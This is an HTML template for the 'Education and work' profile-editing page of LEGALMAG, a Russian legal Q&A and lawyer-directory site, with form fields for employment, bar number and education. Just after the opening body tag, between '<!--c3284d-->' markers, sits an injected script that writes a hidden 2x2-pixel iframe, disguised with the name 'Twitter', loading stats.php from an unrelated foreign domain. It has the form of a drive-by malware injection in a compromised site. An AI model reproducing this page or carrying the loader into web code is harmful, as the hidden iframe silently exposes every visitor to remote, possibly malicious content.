<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<title>LEGALMAG</title>

	<link rel="stylesheet" href="design/css/style.css">
	<!--[if IE 7]><link rel="stylesheet" href="design/css/style_ie7.css" /><![endif]-->
	<!--[if IE 8]><link rel="stylesheet" href="design/css/style_ie8.css" /><![endif]-->
	<!--[if IE 9]><link rel="stylesheet" href="design/css/style_ie9.css" /><![endif]-->
	<link rel="stylesheet" href="design/css/jquery-ui-1.8.20.custom.css">
	<link rel="stylesheet" href="design/css/jquery.ui.selectmenu.css">
	<link rel="stylesheet" href="design/css/jquery.fancybox.css">

	<script src="design/js/jquery-1.7.2.min.js"></script>
	<!--[if lt IE 9]><script src="design/js/html5.js"></script><![endif]-->
	<script src="design/js/custom.js"></script>
</head>

<body><!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://cabaniaseleden.com.ar/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->


	<section id="body">
		<header><!--header-->
			<div class="wrapper">
				<a id="logo" href="index.html" title="LEGALMAG"></a>
				<div id="social-enter">Войти через: <img src="design/images/social-login.jpg" alt=""></div>
				<div id="logged">
					Привет,&nbsp;<a class="enter" href="">Валентин!</a>
					<a class="register" href="">Выйти</a>
					<div class="sep"></div>
				</div>
				<nav class="auth"><!--top-navigation-->
					<ul>
						<li><a href="">Лента вопросов</a></li>
						<li><a href="">Каталог</a></li>
						<li class="active"><a href="">Личный кабинет</a></li>
						<li ><a href="">Вопросы и ответы</a></li>
						<li><a href="">Как это работает?</a></li>
					</ul>
				</nav><!--/top-navigation-->
			</div>
		</header><!--/header-->

		<div class="clear">&nbsp;</div>

		<section id="content"><!--content-->
			<div class="wrapper">
				<aside id="left-profile">
					<div id="userIn">
						<div class="img"><img src="design/images/faceHuge.jpg" alt=""></div>
						<p>Иванова Снежанна</p>
						<p class="myMessages"><a href="">Мои сообщения</a> (<span>3</span>)</p>
					</div>
					<div id="profile">
						<div class="profile">
							<ul>
								<li><a href="">Редактировать профиль</a>
									<ul>
										<li><a href="">Личная информация</a></li>
										<li class="active">Образование и работа</li>
										<li><a href="">Контатная информация</a></li>
										<li><a href="">Услуги</a></li>
										<li><a href="">Настройка оповещений</a></li>
										<li><a href="">Рекламная компания</a></li>
									</ul>
								</li>
								<li class="back"><a href="">Назад</a></li>
							</ul>
						</div>
						<div class="leftSay"></div>
					</div>
				</aside>
				<section id="right-profile">
					<div class="wrapper">
						<div class="head">Редактировать профиль</div>
						<div class="personalInfo wide">
							<form>
								<p class="title">Работа</p>
								<dl>
									<dt><label for="status">Статус в профессиональном сообществе:</label></dt>
									<dd>
										<select id="status">
											<option selected disabled></option>
											<option>Статус в профессиональном сообществе 1</option>
											<option>Статус в профессиональном сообществе 2</option>
											<option>Статус в профессиональном сообществе 3</option>
											<option>Статус в профессиональном сообществе 4</option>
											<option>Статус в профессиональном сообществе 5</option>
											<option>Статус в профессиональном сообществе 6</option>
										</select>
									</dd>
									<dt><label for="employer">Текущее место работы:</label></dt>
									<dd><input type="text" name="employer" id="employer"></dd>
									<dt><label for="experience">Опыт работы по юридической специальности:</label></dt>
									<dd>
										<select id="experience">
											<option selected disabled></option>
											<option>1 год</option>
											<option>2 года</option>
											<option>3 года</option>
											<option>4 года</option>
											<option>5 лет</option>
											<option>6 лет</option>
										</select>
									</dd>
									<dt><label for="specialization">Специализация (5):</label></dt>
									<dd>
										<select id="specialization" multiple size="10">
											<option>Специализация 1</option>
											<option>Специализация 2</option>
											<option>Специализация 3</option>
											<option>Специализация 4</option>
											<option>Специализация 5</option>
											<option>Специализация 6</option>
											<option>Специализация 1</option>
											<option>Специализация 2</option>
											<option>Специализация 3</option>
											<option>Специализация 4</option>
											<option>Специализация 5</option>
											<option>Специализация 6</option>
										</select>
									</dd>
								</dl>
								<div id="rightTop">
									<dl>
										<dt><label for="id">Номер в реестре адвокатов субъекта РФ:</label></dt>
										<dd><input type="text" name="id" id="id"></dd>
										<dt><label for="referal">Аккаунт работодателя в LegalMag:</label></dt>
										<dd><input type="text" name="referal" id="referal" placeholder="legalmag.ru/user221"></dd>
									</dl>
								</div>
								<div class="specializationCaption">
									<p>Выберите теги, описывающие вашу специализацию. Это даст возможность пользователям присылать вам предложения о 	работе, соотвествующие вашей специализации. </p>
									<p><strong>Чтобы выбрать несколько тегов, нажмите Ctrl+click.</strong><br>
									Возможен выбор не более 5 тегов.</p>
								</div>
								<div class="clear">&nbsp;</div>
								<p class="title">Образование</p>
								<dl>
									<dt><label for="town">Город:</label></dt>
									<dd>
										<select id="town">
											<option selected disabled></option>
											<option>москва</option>
											<option>питер</option>
											<option>краснодар</option>
											<option>хаоьков</option>
										</select>
									</dd>
									<dt><label for="education">ВУЗ:</label></dt>
									<dd><input type="text" name="education" id="education"></dd>
									<dt><label for="graduation">Год окончания:</label></dt>
									<dd>
										<select id="graduation">
											<option selected disabled></option>
											<option>2005</option>
											<option>2004</option>
											<option>2003</option>
											<option>2002</option>
											<option>2001</option>
											<option>2000</option>
										</select>
										<input type="checkbox" name="studying" id="studying"><label for="studying">Учусь сейчас</label>
									</dd>
									<dt><label for="progress">Достижения:</label></dt>
									<dd>
										<textarea name="progress" id="progress"></textarea>
										<p class="caption">до 1000 знаков</p>
									</dd>
								</dl>
								<div class="buttonHolder8"><input type="submit" class="buttonSave" value="Сохранить"></div>
							</form>
						</div>
					</div>
				</section>
			</div>
		</section><!--/content-->

	<div class="clear">&nbsp;</div>
	<div id="rasporka"></div>

	</section><!--/body-wrapper-->

	<footer><!--footer-->
		<section class="wrapper">
			<div class="left-col">
				<p>&copy; Legalmag, 2012</p>
				<p>Все права защищены.</p>
				<p style="margin: 20px 0 5px 0;"><a href="">Условия использования</a></p>
				<a href="">Регламент техподдержки</a>
			</div>
			<div class="right-col">
				<nav>
					<ul>
						<li><a href="">О проекте </a></li>
						<li><a href="">Условия использования</a></li>
						<li class="active"><a href="">Для инвесторов</a></li>
						<li><a href="">Безопасность </a></li>
						<li><a href="">Контакты</a></li>
					</ul>
				</nav>
				<div id="paySystems"></div>
			</div>
		</section>
	</footer><!--/footer-->

</body>
</html>